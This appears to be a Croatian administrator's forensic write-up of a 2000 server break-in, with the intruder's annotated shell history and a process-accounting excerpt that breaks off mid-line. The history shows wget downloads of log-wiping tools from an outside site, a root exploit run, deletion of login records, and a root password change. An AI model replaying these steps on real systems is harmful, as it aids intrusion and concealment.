Pogled na provalu sa strane

Dobrica Pavlinušić <dpavlin@rot13.org>
Varaždin, Zagreb, 2000-06-03

To jutro je osvanulo kao i svako drugo. Jutarnja kava bila je prekinuta dolaskom sistem administratora fakultetskog servera koji je sa sobom donosio loše vijesti: provalili su nam u server noćas oko 1. Kava je kava, ali provala je provala te se tako ostatak dana odvijao pored servera na fakultetu. Primarni osumljičeni bio je korisnik imajnari. Već smo imali njegov .bash_history u kojem je bilo mnogo zanimljivih linija...

Komentari iza redova u obliku "# broj" (koji su ujedno i link) su reference na lastcomm datoteku (inače podaci od process accountinga) koja se nalazi u ovom istom dokumentu poslije .bash_history datoteke. Komentari u novom redu (napisani kosim slovima) su moji komentari.

datoteka lastcomm-filtered je napravljena sa
cat -n lastcomm-all | grep -e root -e imajnari -e itot | sort -rn tako da se brojevi zapravo odnose na originalne linije u lastcomm-all datoteci.
Da bi se olakšalo praćenje, prikazani su samo korisnici koji nas zanimaju: root, imajnari i itot.

Nadam se da će ovaj komentar pomoći sistem inžinjerima u razumijevanju sa kakvim korisnicima imaju posla.


.bash_history

rd whereis sulog find sulog ne samo da nezna gdje je sulog nego nezna koristiti niti naredbu find man find ls pwd nohup wget
http://www.anticode.com/archives/log-tools/wipe.tgz / nohup wget http://www.anticode.com/archives/log-tools/wipe.tgz % nohup wget http://www.anticode.com/archives/log-tools/wipe.tgz & treća sreća oko pokretanja wget-a da bi skinuo program za brisanje logova. ls more nohup.out ls pwd ls ./r kako će se kasnije pokazati (pokretanjem strings-a na ovoj datoteci) ovo je exploit za rdist kojim postaje root pwd id whoami provjerava da li mu je exploit uspio su su pwd ls su root su korist ovih višestrukih su-ova (jer već je root) je kranje upitna, osim što svaki od njih zapravo pokreće novi shell, tako da komande upisane u tim sesijama zapravo nemamo (osim u proces accountingu) pwd ls rm -r wipe-1.0 ls rm -r wipe-1.00 ls ls rmdir wipe-1.00 ls cd wipe-1.00/ ls pwd exit obrisao je direktorij u kojem je bio program za brisanje logova (wtmp) i brisanje process accountinga, ali ga *NIJE KOMPAJLIRAO* sa opcijom za brisanje process accountinga. Tek toliko da nekome ne padne na pamet da hvali njegovo znanje i snalažljivost w ls cd / cd ~ ls cd bin/ ls ./r ls cd wipe-1.00 ls rm * ls pwd ls cd .. ls pwd ./r još je nekoliko puta postao root i obrisao direktorij u kojem je kompajlirao wipe-1.0 exit pwd ls ls cd b cd bin ls ./r gcc whereis gcc provjerava gdje se nalazi gcc kompajler. pwd ls ./r pwd nohup wget http://www.anticode.com/archives/log-tools/cloak.c & skida programćić koji mu omogućava da promjeni zapise u utmp-u more nohup.out id pwd ./r pretpostavljam da je u ovoj sesiji pokušao kompajlirati nešto što se zove a, ali da nije radilo. Kao što ćemo kasnije vidjeti na primjeru cloak.c, možda jednostavno nije znao konfigurirati program ili exploit da proradi ./a ls pwd ls rm a ls gcc cloak.c -o c ls ./c rm cloak.c ls chmod 777 c ls ls -al ./c pwd pwd ls rm c Očigledno nezadovoljan sa cloak.c briše datoteku. Da ima imalo znanja, mogao je ući u source kod i barem malo promjeniti #define-ove na vrijednosti koje zapravo odgovaranju Digital Unix-u (umjesto SysV čiji su defaulti u source kodu) ls ls nohup wget http://www.anticode.com/archives/log-tools/logwedit.c & more nohup.out clear pwd ls gcc logwedit.c -o l ls rm logwedit.c ls pwd ls rm nohup.out ls ./r pretpostavljam da je ovdje pokrenuo l koji bi ga trebao sakriti u logovima last | more imajnari pwd last | grep imajnari provjerava da li je program uspješno sakrio tragove (jest) pwd ls id "da li sam još uvijek root?" pwd ls ./r ls ./r w pwd ovo je izgleda kraj ove sesije jer nova sesija počinje u # 20228 sa izvršavanjem login skripti 2000-06-03 u 00:34 Nažalost, sesije prije ovoga ne možemo precizno smjestititi u vrijeme jer su npr. bile otvorene dvije konekcije, a mi imamo samo jedan .bash_history. ls -al cd bin ls ./r id # 20208 ls cd / ls whomai greška u tipkanju... whoami # 20197 ls cd .. pwd pwd cd ~ ls pwd ls cd bin ls last | grep imajnari # 20162 provjerava da li postoji u wtmp logovima ./l imajnari briše logove last | grep imajnari # 20148 provjerava ponovo --> jedini zaključak je da je svjestan da mora prikriti svoje tragove nakon toga gleda što sve ima na sustavu pwd ls pwd cd .. ls cd / ls cd opt Ništa zanimljivo... ls cd .. ls cd proc proc? Zašto gleda u proc? Digital Unix ima vrlo nezanimljiv proc u kojem ima samo brojeve procesa. Možda je mislio da ne neki drugi OS (npr. Linux). Zanimljivo je da nije pogledao sa npr. uname da li poznaje taj OS. ls cd .. ls cd root ulazi u home direktorij administratora sustava ls cd crack zanimljiv direktorij za hackera u kojem se nalaze skripte koje upozoravaju korisnike da imaju slab password. ls ls -al ./make_passwd4crack # 20084 Pokreće skriptu koja stvara passwd datoteku *SA* kriptiranim passwordima da bi crack mogao raditi jer Digital Unix ima C2 security. Sa druge strane, nije ništa učinio sa njome... id ls cd .. ls cd log ls cd .. lsd # 20054 ls more irceri # 20052 cd irceri ls more usr.txt # 20042 ls cd .. ls ls -al ls -al | more # 20004 cd .sysman ls cd .. ls -al | more # 19949 pwd cd .. ls cd sbin ls cd .. ls cd usr ls pwd cd adm ls more messages | grep imajnari # 19906 gleda da li u logovima ima pojavljivanja njegovog imena pwd cd .. ls cd var ls cd log ls cd .. lčs ls pwd cd .. ls cd .. ls cd var ls cd adm ls more messages | grep imajnari # 19851 ls pwd cd .. ls ls cd log ls cd .. ls pwd cd tcb ls ls -al cd files ls ls -al cd subsys ls ls -al ./sysadmin # 19786 Očito nezna da ovaj program radi samo ako ima pokrenute X-Windowse na konzoli (i da mora biti logiran na konzoli) pwd cd .. ls ls -al cd .. ls cd .. ls w # 19781 ps -u imajnari # 19766 kill -9 12506 Ovaj proces je vjerojatno drugi bash, porenut u 00:08 koji se nalazi u liniji # 19757 w # 19755 last | grep imajnari # 19751 pwd ls cd spool ls cd .. ls cd /etc ls -al ls -al | more more passwd Gleda passwd file sa korisnicima (passwordi nisu ovdije) ls ls -al | grep passwd more passwd.pag pokušava binary verziju ls ls -al | grep passwd more passwd.orig backup passworda od prije zadnjeg otvaranja računa ls pwd ls ls -al | more more passwd~ ls ls -al | more cd auth ls cd system ls cd files ls more files # 19533 Sada se već približava pravom mjestu na kojem se nalaze kriptirane lozinke ls pwd ls ls -al more authorize # 19456 ls ls -al cd .. ls cd .. ls cd sec ls more audit_events # 19405 jako kratno gleda ovu datoteku ls cd .. ls -al | grep sec ls -al | grep pass find # 19366 pwd ls cd sm ls cd .. ls pwd cd .. ls more vmunix # 19309 ls more vmunix.save # 19304 gleda binary datoteke kernela (vrlo kratko -- vjerojatno nije znao da su binary) ls man find> ~/bin/find # 19268 cd ~ ls rm nohup.out ls pwd ls cd bin/ ls more find # 19166 Ovu dokumentaciju je čitao skoro 3 min. find . -name root ovo je sigurno kreiralo MNOGO ispisa ls rm find # 19139 ls last # 19110 exit Odlogirava se i dolazi 2000-06-03 u 00:58 Ova sesija počinje u 00:58 pwd uptime ls cd b cd bin/ ls findhost # 19099 ova sesija završila je 2000-06-03 u 00:34 exit ls # 19063 Za ovo logiranje znamo da se desilo 2000-06-03 u 00:58 ./l imajnari ls find> ~/bin/find man find> ~/bin/find ls pine # 18999 ls ls id ls cd . pwd cd /dev ls -al | grep lp pwd cd .. ls ls -al ls -al | more cdroot cd root ls cd ~/bin ls pine # 18902 čita poštu, kratko clear w finger vkaminsk # 18893 clear ps -u ikaminsk ps -u vkaminsk kill -9 9758 w ls pwd ls rm find # 18845 ls cd /usr/adm ls cd senmail cd sendmail ls ls -al pico sendmail.st # 18814 ls mail # 18758 clear id pwd cd .. ls cd messages ls more messages more messages | grep Jun more messages | grep Jun 3 more messages | grep imajnari ls pine # 18633 clear pine # 18609 clear w pwd ls cd .. ls ls pwd ls cd adm ls cd smlogs ls cd .. ls ls -al cd syslog ls cd .. ls cd .. ls cd .. ls pwd ls find . -name password* # 18511 Očigledno čita neku uputu za crackanje i pokušava naći password file. Nažalost, file se zove passwd (kao što je već vidio prije!) find / -name password find . -name password find / -name password find / find / -name password find / | grep password find . -name password*/ ls man find # 18370 alternativni pristup... find . -mtime 1 -print ...probajmo naći sve što je mijenjano u zadnjem danu ls man find # 18334 find / -name password -print find / -name .password -print man find # 18263 pwd id # 18251 ls pwd cd root ls cd bin ls cd .. ls ls -al | more ls pwd cd .. ls pwd su # 18146 id exit i odlogirava se 2000-03-06 u 01:24 w # 18100 id passwd root # 18077 u 01:25 mijenja root lozinku (valjda frustriran jer ništa drugo nije uspio napraviti u pedeset minuta od prvog logiranja! DEFINITIVNO ČIN NAMJENJEN UNIŠTAVANJU PODATAKA ILI ONEMOGUĆAVANJU KORIŠTENJA SERVERA! pwd pwd pwd exit ./l imajnari # 17968 briše logove za sobom lastlog | grep imajnari last | grep imajnari exit pwd ls last | grep imajnari ls cd bin ls ./l imajnari # 17956 ls id /usr/bin/findhost # 17949 id su pwd /usr/bin/findhost ls ./r pwd su su root pwd ls ./l imajnari /usr/bin/findhost exit cd Ą~ cd ~ ls pwd cd .. ls exit pwd cd bin /.r ./r /usr/bin/findhost # 17661 pwd cd .. cd .. ls pwd finger ikralj # 17637 finger itot pwd cd ~ ls cd bin ls ./r exit u liniji # 2643 pojavljuje se u 09:47 prvi pokušaji pronalaska krivca.

lastcomm-filtered

21838 sh S root __ 0.02 secs Sat Jun 3 00:00 21823 ac S root __ 0.34 secs Sat Jun 3 00:00 21822 sort S root __ 0.08 secs Sat Jun 3 00:00 21821 head S root __ 0.01 secs Sat Jun 3 00:00 21820 sed S root __ 0.01 secs Sat Jun 3 00:00 21819 sed S root __ 0.02 secs Sat Jun 3 00:00 21818 grep S root __ 0.06 secs Sat Jun 3 00:00 21817 cat S root __ 0.01 secs Sat Jun 3 00:00 21816 cut S root __ 0.01 secs Sat Jun 3 00:00 21815 cat S root __ 0.01 secs Sat Jun 3 00:00 21814 grep S root __ 0.30 secs Sat Jun 3 00:00 21813 cut S root __ 0.01 secs Sat Jun 3 00:00 21812 cut S root __ 0.01 secs Sat Jun 3 00:00 21810 sort S root __ 0.01 secs Sat Jun 3 00:00 21809 sort S root __ 0.01 secs Sat Jun 3 00:00 21808 join S root __ 0.01 secs Sat Jun 3 00:00 21807 sort S root __ 0.01 secs Sat Jun 3 00:00 21806 sed S root __ 0.01 secs Sat Jun 3 00:00 21805 expand S root __ 0.01 secs Sat Jun 3 00:00 21804 cat S root __ 0.01 secs Sat Jun 3 00:00 21803 cat S root __ 0.01 secs Sat Jun 3 00:00 21802 rm S root __ 0.01 secs Sat Jun 3 00:00 21801 sh S root __ 0.05 secs Sat Jun 3 00:00 21800 sh S root __ 0.02 secs Sat Jun 3 00:00 21769 sendmail SF root __ 0.05 secs Sat Jun 3 00:00 21767 sendmail SF root __ 0.06 secs Sat Jun 3 00:00 21761 sendmail SF root __ 0.02 secs Fri Jun 2 23:59 21735 more S root ttyp0 0.28 secs Fri Jun 2 23:59 21734 ls S root ttyp0 0.03 secs Sat Jun 3 00:01 21720 more S root ttyp0 0.03 secs Sat Jun 3 00:01 21719 ls S root ttyp0 0.03 secs Sat Jun 3 00:01 21710 sendmail SF root __ 0.05 secs Fri Jun 2 23:54 21705 more S root ttyp0 0.03 secs Sat Jun 3 00:02 21704 ls S root ttyp0 0.03 secs Sat Jun 3 00:02 21703 more S root ttyp0 0.02 secs Sat Jun 3 00:02 21702 ls S root ttyp0 0.02 secs Sat Jun 3 00:02 21692 cat S root __ 0.01 secs Sat Jun 3 00:02 21691 sendmail SF root __ 0.01 secs Sat Jun 3 00:02 21690 sendmail S root __ 0.20 secs Sat Jun 3 00:02 21689 sh S root __ 0.01 secs Sat Jun 3 00:02 21688 sendmail SF root __ 0.02 secs Sat Jun 3 00:02 21687 sendmail SF root __ 0.05 secs Sat Jun 3 00:02 21686 sendmail SF root __ 0.03 secs Sat Jun 3 00:01 21684 sendmail SF root __ 0.05 secs Sat Jun 3 00:02 21680 ls S root ttyp0 0.06 secs Sat Jun 3 00:02 21663 more S root ttyp0 0.03 secs Sat Jun 3 00:02 21662 ls S root ttyp0 0.02 secs Sat Jun 3 00:03 21644 ls S root ttyp0 0.03 secs Sat Jun 3 00:03 21638 more S root ttyp0 0.03 secs Sat Jun 3 00:03 21637 sh S root ttyp0 0.03 secs Sat Jun 3 00:03 21626 ls S root ttyp0 0.02 secs Sat Jun 3 00:03 21616 popisstu SF root ttyp0 0.01 secs Sat Jun 3 00:03 21615 popisstu S root ttyp0 0.01 secs Sat Jun 3 00:03 21609 proftpd S root __ 0.12 secs Sat Jun 3 00:04 21608 ls S root ttyp0 0.03 secs Sat Jun 3 00:04 21607 more S root ttyp0 0.03 secs Sat Jun 3 00:04 21606 sh S root ttyp0 0.01 secs Sat Jun 3 00:04 21597 sh S root ttyp0 0.01 secs Sat Jun 3 00:04 21595 ls S root ttyp0 0.05 secs Sat Jun 3 00:04 21451 sendmail SF root __ 0.03 secs Sat Jun 3 00:04 21450 procmail S root __ 0.11 secs Sat Jun 3 00:05 21448 sendmail SF root __ 0.05 secs Sat Jun 3 00:05 21447 sendmail SF root __ 0.01 secs Sat Jun 3 00:05 21446 sendmail S root __ 0.20 secs Sat Jun 3 00:05 21444 sendmail SF root __ 0.02 secs Sat Jun 3 00:05 21443 sendmail SF root __ 0.05 secs Sat Jun 3 00:02 21442 sendmail SF root __ 0.05 secs Sat Jun 3 00:04 21428 sendmail SF root __ 0.03 secs Sat Jun 3 00:02 21427 ls S root ttyp0 0.02 secs Sat Jun 3 00:05 21423 ls S root ttyp0 0.03 secs Sat Jun 3 00:05 21418 telnetd S root __ 0.06 secs Sat Jun 3 00:05 21417 Widget.c S root __ 0.06 secs Sat Jun 3 00:05 21416 cucipop S root __ 0.03 secs Sat Jun 3 00:05 21402 ls S root ttyp0 0.03 secs Sat Jun 3 00:06 21383 Widget.c S root __ 0.05 secs Sat Jun 3 00:06 21382 telnetd S root __ 0.06 secs Sat Jun 3 00:06 21361 cucipop S root __ 0.03 secs Sat Jun 3 00:05 21327 cat S root __ 0.01 secs Sat Jun 3 00:07 21326 sendmail SF root __ 0.01 secs Sat Jun 3 00:07 21325 sendmail S root __ 0.20 secs Sat Jun 3 00:07 21324 sh S root __ 0.01 secs Sat Jun 3 00:07 21323 sendmail SF root __ 0.02 secs Sat Jun 3 00:07 21316 sendmail SF root __ 0.05 secs Sat Jun 3 00:07 21309 sendmail SF root __ 0.08 secs Sat Jun 3 00:08 21305 sendmail SF root __ 0.03 secs Sat Jun 3 00:06 21294 sh S root ttyp0 0.88 secs Fri Jun 2 23:36 21293 sh root ttyp0 0.03 secs Fri Jun 2 23:36 21292 bash imajnari __ 1.00 secs Fri Jun 2 22:59 21291 telnetd S root __ 2.61 secs Fri Jun 2 22:59 21289 sendmail SF root __ 0.17 secs Sat Jun 3 00:05 21285 cat imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21284 bash F imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21283 stty imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21282 tset imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21281 hostname imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21280 bash F imajnari ttyp2 0.01 secs Sat Jun 3 00:08 21274 cucipop S root __ 0.05 secs Sat Jun 3 00:06 21273 cucipop S root __ 0.05 secs Sat Jun 3 00:09 21271 proftpd S root __ 0.14 secs Sat Jun 3 00:04 21257 cucipop S root __ 0.06 secs Sat Jun 3 00:09 21242 ffingerd S root __ 0.02 secs Sat Jun 3 00:09 21236 w S imajnari ttyp2 0.02 secs Sat Jun 3 00:09 21227 ls imajnari ttyp2 0.03 secs Sat Jun 3 00:09 21211 ls imajnari ttyp2 0.01 secs Sat Jun 3 00:10 21207 ls S root ttyp2 0.01 secs Sat Jun 3 00:10 21201 l S root ttyp2 0.14 secs Sat Jun 3 00:10 21200 proftpd S root __ 0.11 secs Sat Jun 3 00:10 21184 last S root ttyp2 0.58 secs Sat Jun 3 00:10 21183 grep S root ttyp2 0.02 secs Sat Jun 3 00:10 21182 ls S root ttyp2 0.02 secs Sat Jun 3 00:10 21165 proftpd S root __ 0.14 secs Sat Jun 3 00:10 21155 sendmail SF root __ 0.05 secs Sat Jun 3 00:11 21154 sendmail SF root __ 0.05 secs Sat Jun 3 00:10 21152 sendmail SF root __ 0.05 secs Sat Jun 3 00:11 21151 ffingerd S root __ 0.02 secs Sat Jun 3 00:11 21133 sendmail SF root __ 0.05 secs Sat Jun 3 00:11 21131 sendmail SF root __ 0.05 secs Sat Jun 3 00:12 21114 cat S root __ 0.01 secs Sat Jun 3 00:12 21113 sendmail SF root __ 0.01 secs Sat Jun 3 00:12 21112 sendmail S root __ 0.20 secs Sat Jun 3 00:12 21111 sh S root __ 0.01 secs Sat Jun 3 00:12 21110 sendmail SF root __ 0.01 secs Sat Jun 3 00:12 21059 sendmail SF root __ 0.05 secs Sat Jun 3 00:11 21048 ls S root ttyp2 0.01 secs Sat Jun 3 00:13 21040 sendmail SF root __ 0.03 secs Sat Jun 3 00:09 21022 proftpd S root __ 0.23 secs Sat Jun 3 00:11 20996 sendmail SF root __ 0.05 secs Sat Jun 3 00:14 20994 sendmail SF root __ 0.08 secs Sat Jun 3 00:14 20988 sendmail SF root __ 0.02 secs Sat Jun 3 00:13 20987 sendmail SF root __ 0.08 secs Sat Jun 3 00:14 20980 sendmail SF root __ 0.12 secs Sat Jun 3 00:14 20968 sendmail SF root __ 0.03 secs Sat Jun 3 00:13 20916 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20912 ls S root ttyp2 0.03 secs Sat Jun 3 00:16 20909 more S root ttyp2 0.03 secs Sat Jun 3 00:16 20905 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20901 ls S root ttyp2 0.02 secs Sat Jun 3 00:16 20899 more S root ttyp2 0.02 secs Sat Jun 3 00:16 20898 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20897 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20893 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20892 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20886 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20885 sendmail SF root __ 0.05 secs Sat Jun 3 00:16 20884 ls S root ttyp2 0.01 secs Sat Jun 3 00:16 20883 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20881 sendmail SF root __ 0.06 secs Sat Jun 3 00:16 20880 sendmail SF root __ 0.03 secs Sat Jun 3 00:15 20879 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20846 cat S root __ 0.01 secs Sat Jun 3 00:17 20845 sendmail SF root __ 0.01 secs Sat Jun 3 00:17 20844 sendmail S root __ 0.22 secs Sat Jun 3 00:17 20843 sh S root __ 0.01 secs Sat Jun 3 00:17 20842 ls S root ttyp2 0.02 secs Sat Jun 3 00:17 20841 sendmail SF root __ 0.02 secs Sat Jun 3 00:17 20838 more S root ttyp2 0.03 secs Sat Jun 3 00:17 20837 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20831 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20830 sendmail SF root __ 0.05 secs Sat Jun 3 00:17 20828 sendmail SF root __ 0.06 secs Sat Jun 3 00:17 20827 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20826 sendmail SF root __ 0.02 secs Sat Jun 3 00:15 20825 ls S root ttyp2 0.01 secs Sat Jun 3 00:17 20821 more S root ttyp2 0.03 secs Sat Jun 3 00:18 20820 ls S root ttyp2 0.01 secs Sat Jun 3 00:18 20819 ls S root ttyp2 0.01 secs Sat Jun 3 00:18 20816 ls S root ttyp2 0.01 secs Sat Jun 3 00:18 20808 sendmail SF root __ 0.05 secs Sat Jun 3 00:17 20806 sendmail SF root __ 0.05 secs Sat Jun 3 00:18 20805 ls S root ttyp2 0.01 secs Sat Jun 3 00:18 20804 sendmail SF root __ 0.03 secs Sat Jun 3 00:16 20803 ls S root ttyp2 0.01 secs Sat Jun 3 00:18 20796 ls S root ttyp2 0.03 secs Sat Jun 3 00:18 20795 sendmail SF root __ 0.05 secs Sat Jun 3 00:18 20791 sendmail SF root __ 0.06 secs Sat Jun 3 00:18 20790 ls S root ttyp2 0.05 secs Sat Jun 3 00:19 20781 sendmail SF root __ 0.03 secs Sat Jun 3 00:16 20728 sendmail SF root __ 0.06 secs Sat Jun 3 00:19 20726 sendmail SF root __ 0.06 secs Sat Jun 3 00:20 20714 mail S root __ 0.05 secs Sat Jun 3 00:20 20713 chkforwa S root __ 2.27 secs Sat Jun 3 00:20 20712 make_dis S root __ 0.61 secs Sat Jun 3 00:20 20711 date S root __ 0.01 secs Sat Jun 3 00:20 20710 lastcomm S root __ 0.67 secs Sat Jun 3 00:20 20709 cmp S root __ 0.01 secs Sat Jun 3 00:20 20708 grep S root __ 0.05 secs Sat Jun 3 00:20 20707 cut S root __ 0.01 secs Sat Jun 3 00:20 20706 cp S root __ 0.01 secs Sat Jun 3 00:20 20705 cmp S root __ 0.01 secs Sat Jun 3 00:20 20704 cron.sh S root __ 0.02 secs Sat Jun 3 00:20 20703 sh S root __ 0.02 secs Sat Jun 3 00:20 20702 cat S root __ 0.01 secs Sat Jun 3 00:20 20701 sendmail SF root __ 0.01 secs Sat Jun 3 00:20 20700 sendmail S root __ 0.22 secs Sat Jun 3 00:20 20699 sh S root __ 0.01 secs Sat Jun 3 00:20 20697 sendmail SF root __ 0.02 secs Sat Jun 3 00:20 20687 sendmail SF root __ 0.06 secs Sat Jun 3 00:20 20679 sendmail SF root __ 0.06 secs Sat Jun 3 00:20 20677 sendmail SF root __ 0.06 secs Sat Jun 3 00:20 20675 sendmail SF root __ 0.06 secs Sat Jun 3 00:20 20674 sendmail SF root __ 0.05 secs Sat Jun 3 00:18 20673 sendmail SF root __ 0.03 secs Sat Jun 3 00:21 20672 sendmail SF root __ 0.03 secs Sat Jun 3 00:20 20670 sendmail SF root __ 0.05 secs Sat Jun 3 00:21 20669 sendmail SF root __ 0.03 secs Sat Jun 3 00:19 20660 sendmail SF root __ 0.05 secs Sat Jun 3 00:17 20617 telnetd S root __ 0.30 secs Sat Jun 3 00:12 20609 cat S root __ 0.01 secs Sat Jun 3 00:22 20608 sendmail SF root __ 0.01 secs Sat Jun 3 00:22 20607 sendmail S root __ 0.20 secs Sat Jun 3 00:22 20606 sh S root __ 0.01 secs Sat Jun 3 00:22 20605 sendmail SF root __ 0.02 secs Sat Jun 3 00:22 20586 telnetd S root __ 0.08 secs Sat Jun 3 00:22 20578 telnetd S root __ 0.06 secs Sat Jun 3 00:22 20570 telnetd S root __ 0.06 secs Sat Jun 3 00:23 20566 telnetd S root __ 0.03 secs Sat Jun 3 00:24 20560 sendmail SF root __ 0.05 secs Sat Jun 3 00:23 20558 sendmail SF root __ 0.05 secs Sat Jun 3 00:24 20557 sendmail SF root __ 0.05 secs Sat Jun 3 00:24 20551 sendmail SF root __ 0.02 secs Sat Jun 3 00:22 20545 sendmail SF root __ 0.03 secs Sat Jun 3 00:22 20541 sendmail SF root __ 0.06 secs Sat Jun 3 00:24 20524 sendmail SF root __ 0.02 secs Sat Jun 3 00:16 20520 sendmail SF root __ 0.03 secs Sat Jun 3 00:25 20518 sendmail SF root __ 0.06 secs Sat Jun 3 00:25 20514 sendmail SF root __ 0.02 secs Sat Jun 3 00:23 20508 sendmail SF root __ 0.06 secs Sat Jun 3 00:25 20506 sendmail SF root __ 0.06 secs Sat Jun 3 00:25 20505 sendmail SF root __ 0.03 secs Sat Jun 3 00:23 20500 telnetd S root __ 0.06 secs Sat Jun 3 00:24 20490 sendmail SF root __ 0.05 secs Sat Jun 3 00:25 20488 sendmail SF root __ 0.06 secs Sat Jun 3 00:26 20484 sendmail SF root __ 0.03 secs Sat Jun 3 00:24 20483 sendmail SF root __ 0.05 secs Sat Jun 3 00:25 20481 sendmail SF root __ 0.06 secs Sat Jun 3 00:26 20476 sendmail SF root __ 0.02 secs Sat Jun 3 00:24 20457 sendmail SF root __ 0.05 secs Sat Jun 3 00:26 20455 sendmail SF root __ 0.06 secs Sat Jun 3 00:27 20445 sendmail SF root __ 0.03 secs Sat Jun 3 00:25 20435 cat S root __ 0.01 secs Sat Jun 3 00:27 20434 sendmail SF root __ 0.01 secs Sat Jun 3 00:27 20433 sendmail S root __ 0.20 secs Sat Jun 3 00:27 20432 sh S root __ 0.01 secs Sat Jun 3 00:27 20431 sendmail SF root __ 0.02 secs Sat Jun 3 00:27 20423 sendmail SF root __ 0.08 secs Sat Jun 3 00:26 20416 sendmail SF root __ 0.08 secs Sat Jun 3 00:27 20415 sendmail SF root __ 0.08 secs Sat Jun 3 00:27 20413 sendmail SF root __ 0.08 secs Sat Jun 3 00:28 20412 sendmail SF root __ 0.02 secs Sat Jun 3 00:24 20410 sendmail SF root __ 0.02 secs Sat Jun 3 00:24 20404 sendmail SF root __ 0.05 secs Sat Jun 3 00:26 20399 telnetd S root __ 0.20 secs Fri Jun 2 23:54 20398 telnetd S root __ 0.06 secs Sat Jun 3 00:28 20376 cucipop S root __ 0.05 secs Sat Jun 3 00:29 20375 telnetd S root __ 0.06 secs Sat Jun 3 00:27 20372 telnetd S root __ 0.41 secs Sat Jun 3 00:13 20338 telnetd S root __ 0.08 secs Sat Jun 3 00:30 20324 telnetd S root __ 0.06 secs Sat Jun 3 00:30 20314 sendmail SF root __ 0.05 secs Sat Jun 3 00:30 20307 sendmail SF root __ 0.05 secs Sat Jun 3 00:31 20306 sendmail SF root __ 0.05 secs Sat Jun 3 00:29 20297 telnetd S root __ 0.05 secs Sat Jun 3 00:30 20280 telnetd S root __ 0.06 secs Sat Jun 3 00:31 20269 cat S root __ 0.01 secs Sat Jun 3 00:32 20268 sendmail SF root __ 0.01 secs Sat Jun 3 00:32 20267 sendmail S root __ 0.22 secs Sat Jun 3 00:32 20266 sh S root __ 0.01 secs Sat Jun 3 00:32 20265 sendmail SF root __ 0.02 secs Sat Jun 3 00:32 20264 Widget.c S root __ 0.08 secs Sat Jun 3 00:31 20263 telnetd S root __ 0.08 secs Sat Jun 3 00:30 20254 sendmail SF root __ 0.05 secs Sat Jun 3 00:32 20252 sendmail SF root __ 0.05 secs Sat Jun 3 00:32 20246 sendmail SF root __ 0.16 secs Sat Jun 3 00:25 20245 sendmail SF root __ 0.03 secs Sat Jun 3 00:24 20242 sendmail SF root __ 0.05 secs Sat Jun 3 00:33 20241 sendmail SF root __ 0.02 secs Sat Jun 3 00:32 20239 sendmail SF root __ 0.05 secs Sat Jun 3 00:33 20233 proftpd S root __ 0.11 secs Sat Jun 3 00:33 20231 sendmail SF root __ 0.16 secs Sat Jun 3 00:34 20229 sendmail SF root __ 0.02 secs Sat Jun 3 00:34
20228 cat imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20227 bash F imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20226 stty imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20225 tset imajnari ttyp3 0.02 secs Sat Jun 3 00:34 20224 hostname imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20223 bash F imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20222 uptime S imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20221 ls imajnari ttyp3 0.02 secs Sat Jun 3 00:34 20218 sendmail SF root __ 0.06 secs Sat Jun 3 00:33 20217 ls imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20215 sendmail SF root __ 0.08 secs Sat Jun 3 00:34 20208 id S imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20202 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20201 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20200 findhost SF imajnari ttyp3 0.01 secs Sat Jun 3 00:34 20197 whoami S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20185 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20184 sendmail SF root __ 0.05 secs Sat Jun 3 00:34 20182 sendmail SF root __ 0.05 secs Sat Jun 3 00:35 20174 sendmail SF root __ 0.03 secs Sat Jun 3 00:33 20173 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20172 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20168 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20162 last S imajnari ttyp3 0.61 secs Sat Jun 3 00:35 20161 grep S imajnari ttyp3 0.06 secs Sat Jun 3 00:35 20156 l S imajnari ttyp3 0.14 secs Sat Jun 3 00:35 20148 last S imajnari ttyp3 0.62 secs Sat Jun 3 00:35 20147 grep S imajnari ttyp3 0.03 secs Sat Jun 3 00:35 20143 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:35 20133 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20132 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20117 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20116 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20115 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20114 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20113 sendmail SF root __ 0.03 secs Sat Jun 3 00:30 20112 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:36 20106 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:36 20097 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:36 20084 make_pas S imajnari ttyp3 0.03 secs Sat Jun 3 00:37 20078 id S imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20073 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20072 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20064 cat S root __ 0.01 secs Sat Jun 3 00:37 20061 sendmail SF root __ 0.01 